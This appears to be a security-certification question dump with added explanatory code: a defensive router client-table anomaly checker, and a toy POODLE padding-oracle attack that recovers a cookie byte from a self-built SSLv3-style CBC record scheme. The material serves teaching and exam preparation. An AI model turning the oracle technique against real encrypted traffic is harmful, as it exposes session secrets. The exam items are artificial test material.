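A client table like this one is worth reading mechanically before touching the router: two hosts claiming the same IP address, a host on a different subnet, a hostname the owner does not recognise, and a MAC whose locally-administered bit is set (bit 1 of the first octet, the sign of a software-assigned address) are each a reason to look closer. The script below is an added example, not part of the test; the rows are the ones in the question, while the LAN range 192.168.1.0/24 and the list of known hostnames are assumptions made for the example.

```python
"""Flag suspicious entries in a home router's connected-client table."""
import ipaddress
from collections import Counter

# Rows as shown in the question (header line first).
CLIENT_TABLE = """\
Hostname IP_Address MAC MAC_Filter
DadPC 192.168.1.15 00:1D:1A:44:17:B5 On
MomPC 192.168.1.15 21:13:D6:C5:42:A2 Off
JuniorPC 192.168.2.16 42:A7:D1:25:11:52 On
Unknown 192.168.1.18 10:B3:22:1A:FF:21 Off
"""

# Assumptions for the example: the LAN the router serves and the devices the owner recognises.
LAN = ipaddress.ip_network("192.168.1.0/24")
KNOWN_HOSTS = {"DadPC", "MomPC", "JuniorPC"}


def parse_table(text):
    rows = []
    for line in text.splitlines()[1:]:          # skip the header
        host, ip, mac, flt = line.split()
        rows.append({"host": host, "ip": ipaddress.ip_address(ip),
                     "mac": mac.upper(), "filter": flt == "On"})
    return rows


def is_locally_administered(mac):
    """The U/L bit (0x02 in the first octet) marks a MAC set by software rather than
    burned in by the vendor: typical of randomised or spoofed addresses."""
    return int(mac.split(":")[0], 16) & 0x02 != 0


def find_anomalies(rows, lan=LAN, known_hosts=KNOWN_HOSTS):
    """Return (hostname, reason) pairs. A spoofed MAC that exactly copies an authorised
    device is invisible here, which is why physically checking the real systems is the
    next step; this only tells the owner where to look first."""
    findings = []
    ip_count = Counter(r["ip"] for r in rows)
    mac_count = Counter(r["mac"] for r in rows)
    for r in rows:
        if ip_count[r["ip"]] > 1:
            findings.append((r["host"], f"IP {r['ip']} is also claimed by another MAC"))
        if mac_count[r["mac"]] > 1:
            findings.append((r["host"], f"MAC {r['mac']} appears more than once"))
        if r["ip"] not in lan:
            findings.append((r["host"], f"IP {r['ip']} is outside {lan}"))
        if is_locally_administered(r["mac"]):
            findings.append((r["host"], f"MAC {r['mac']} has the locally administered bit set"))
        if r["host"] not in known_hosts:
            findings.append((r["host"], "hostname is not in the known-device list"))
        if not r["filter"]:
            findings.append((r["host"], "MAC filter is not applied"))
    return findings


def check_home_network():
    """Run the rules against the table from the question with the example's assumptions."""
    return find_anomalies(parse_table(CLIENT_TABLE))


if __name__ == "__main__":
    for host, reason in check_home_network():
        print(f"{host:9} {reason}")
```

On this table every host trips at least one rule, which is the point of the exam answer: the table alone cannot prove who is on the network, so the owner has to confirm which authorised machines are really present before trusting or blocking any entry.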
The POODLE attack is a MITM exploit that affects: TLS1.0 with CBC mode cipher SSLv2.0 with CBC mode cipher SSLv3.0 with CBC mode cipher SSLv3.0 with ECB mode cipher.
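The reason POODLE is specific to SSLv3 CBC cipher suites is a detail of the record format: SSLv3 pads MAC-then-encrypted records and, on receipt, checks only the final byte (the padding length) while ignoring the padding bytes themselves. When a record ends in a full block of padding, an attacker who can make the victim resend a request can copy any earlier ciphertext block over that final block; the server accepts it exactly when the decrypted last byte happens to equal the padding length, which leaks one plaintext byte per roughly 256 requests. TLS requires every padding byte to equal the length byte, so the same tampering fails. The following is an added toy implementation of that oracle, not code from the test or from any SSL/TLS stack; assumptions: a hash-based Feistel network stands in for the 16-byte block cipher (the attack needs only CBC, not a particular cipher), the MAC is HMAC-SHA256 truncated to 16 bytes, and the victim request and keys are constructed for the example.

```python
"""Toy POODLE: SSLv3-style CBC padding check versus TLS-style check."""
import hashlib
import hmac
import os

BLOCK = 16
ROUNDS = 8


def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def _f(key, i, half):
    """Keyed round function of the stand-in block cipher."""
    return hashlib.sha256(key + bytes([i]) + half).digest()[:8]


def block_encrypt(key, block):
    l, r = block[:8], block[8:]
    for i in range(ROUNDS):
        l, r = r, _xor(l, _f(key, i, r))
    return l + r


def block_decrypt(key, block):
    l, r = block[:8], block[8:]
    for i in reversed(range(ROUNDS)):
        l, r = _xor(r, _f(key, i, l)), l
    return l + r


def cbc_encrypt(key, iv, pt):
    out, prev = [], iv
    for i in range(0, len(pt), BLOCK):
        prev = block_encrypt(key, _xor(pt[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)


def cbc_decrypt(key, iv, ct):
    out, prev = [], iv
    for i in range(0, len(ct), BLOCK):
        out.append(_xor(block_decrypt(key, ct[i:i + BLOCK]), prev))
        prev = ct[i:i + BLOCK]
    return b"".join(out)


def seal(enc_key, mac_key, data, tls_style_padding=False):
    """Client side: MAC, then pad (last byte = padding length), then CBC-encrypt with a fresh IV.
    SSLv3 leaves the padding bytes arbitrary; TLS sets each of them to the length value."""
    mac = hmac.new(mac_key, data, hashlib.sha256).digest()[:16]
    body = data + mac
    pad_len = BLOCK - len(body) % BLOCK - 1        # 0..15; a full padding block when body is aligned
    filler = bytes([pad_len]) * pad_len if tls_style_padding else os.urandom(pad_len)
    iv = os.urandom(BLOCK)
    return iv, cbc_encrypt(enc_key, iv, body + filler + bytes([pad_len]))


def open_record(enc_key, mac_key, iv, ct, tls_style_padding):
    """Server side: True if the record is accepted. SSLv3 trusts the length byte alone;
    TLS additionally rejects any padding byte that differs from it."""
    pt = cbc_decrypt(enc_key, iv, ct)
    pad_len = pt[-1]
    if pad_len + 1 + 16 > len(pt):
        return False
    if tls_style_padding and any(b != pad_len for b in pt[-(pad_len + 1):-1]):
        return False
    body = pt[:len(pt) - pad_len - 1]
    data, mac = body[:-16], body[-16:]
    return hmac.compare_digest(mac, hmac.new(mac_key, data, hashlib.sha256).digest()[:16])


def poodle_last_byte(send_record, oracle, target_block, max_tries=8192):
    """Recover the last plaintext byte of ciphertext block `target_block` (0-based).
    send_record() makes the victim emit a fresh record whose final block is all padding;
    oracle(iv, ct) says whether the server accepted a record. Copying C_target over the
    final block C_n makes it decrypt to P_target ^ C_{target-1} ^ C_{n-1}, which passes
    the SSLv3 check exactly when its last byte is 15, so an accept pins down P_target[-1]."""
    for tries in range(1, max_tries + 1):
        iv, ct = send_record()
        blocks = [iv] + [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]   # blocks[k+1] is C_k
        if oracle(iv, ct[:-BLOCK] + blocks[target_block + 1]):
            return 15 ^ blocks[target_block][-1] ^ blocks[-2][-1], tries
    return None, max_tries


def demo(tls_style_padding=False, target_block=1, max_tries=8192):
    """Constructed victim request: two 16-byte data blocks (block 1 ends in the secret
    cookie byte 'a'); data (32) + MAC (16) = 48 bytes, so the final block is all padding."""
    enc_key, mac_key = os.urandom(16), os.urandom(16)
    data = b"GET / HTTP/1.0\r\n" + b"Cookie: SID=7f3a"
    return poodle_last_byte(
        lambda: seal(enc_key, mac_key, data, tls_style_padding),
        lambda iv, ct: open_record(enc_key, mac_key, iv, ct, tls_style_padding),
        target_block, max_tries)


def legit_roundtrip(tls_style_padding):
    """Sanity check: an untampered record is accepted under either padding rule."""
    enc_key, mac_key = os.urandom(16), os.urandom(16)
    iv, ct = seal(enc_key, mac_key, b"hello", tls_style_padding)
    return open_record(enc_key, mac_key, iv, ct, tls_style_padding)


if __name__ == "__main__":
    byte, tries = demo()
    print(f"SSLv3 oracle: recovered {chr(byte)!r} after {tries} requests")
    print("TLS-style oracle:", demo(tls_style_padding=True))
```

A full POODLE run repeats this with the request shifted one byte at a time so that each cookie byte in turn lands at the end of a block; the toy recovers one byte to show the mechanism. Under the TLS rule the copied block's fifteen random padding bytes almost never all equal 15, so the loop runs out of tries, which is why the fix is to disable SSLv3 (and, for the later TLS variants on broken implementations, to check the padding properly).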
Security administrators attempted corrective action after a phishing attack. Users are still experiencing trouble logging in, as well as an increase in account lockouts. Users' email contacts are complaining of an increase in spam and social networking requests. Due to the large number of affected accounts, remediation must be accomplished quickly. Which of the following actions should be taken FIRST? (Select TWO) Disable the compromised accounts Update WAF rules to block social networks Remove the compromised accounts from all AD groups Change the compromised accounts' passwords Disable the open relay on the email server Enable sender policy framework.
Ann, a security administrator, wants to ensure credentials are encrypted in transit when implementing a RADIUS server for SSO. Which of the following are needed given these requirements? (Select TWO) Public key Shared key Elliptic curve MD5 Private key DES.
Which of the following allows an auditor to test proprietary-software compiled code for security flaws? Fuzzing Static review Code signing Regression testing.
Which of the following is the BEST reason to run an untested application in a sandbox? To allow the application to take full advantage of the host system's resources and storage To utilize the host system's antivirus and firewall applications instead of running its own protection To prevent the application from acquiring escalated privileges and accessing its host system To increase application processing speed so the host system can perform real-time logging.
A manager wants to distribute a report to several other managers within the company. Some of them reside in remote locations that are not connected to the domain but have a local server. Because there is sensitive data within the report and the size is beyond the limit of the email attachment size, emailing the report is not an option. Which of the following protocols should be implemented to distribute the report securely? (Select TWO) S/MIME SSH SNMPv3 FTPS SRTP HTTPS LDAPS.
A company is performing an analysis of the corporate enterprise network with the intent of identifying what will cause losses in revenue, referrals, and/or reputation when out of commission. Which of the following is an element of a BIA that is being addressed? Mission-essential function Single point of failure Backup and restoration plans Identification of critical systems.
Ann, a user, states that her machine has been behaving erratically over the past week. She has experienced slowness and input lag and found text files that appear to contain pieces of her emails or online conversations with coworkers. The technician runs a standard virus scan but detects nothing. Which of the following types of malware has infected the machine? Ransomware Rootkit Backdoor Keylogger.
A security analyst is attempting to identify vulnerabilities in a customer's web application without impacting the system or its data. Which of the following BEST describes the vulnerability scanning concept performed? Aggressive scan Passive scan Non-credentialed scan Compliance scan.
A systems administrator wants to implement a wireless protocol that will allow the organization to authenticate mobile devices prior to providing the user with a captive portal login. Which of the following should the systems administrator configure? L2TP with MAC filtering EAP-TTLS WPA2-CCMP with PSK RADIUS federation.
A user receives an email from the ISP indicating malicious traffic coming from the user's home network is detected. The traffic appears to be Linux-based, and it is targeting a website that was recently featured on the news as being taken offline by an Internet attack. The only Linux device on the network is a home surveillance camera system. Which of the following BEST describes what is happening? The camera system is infected with a bot. The camera system is infected with a RAT. The camera system is infected with a Trojan. The camera system is infected with a backdoor.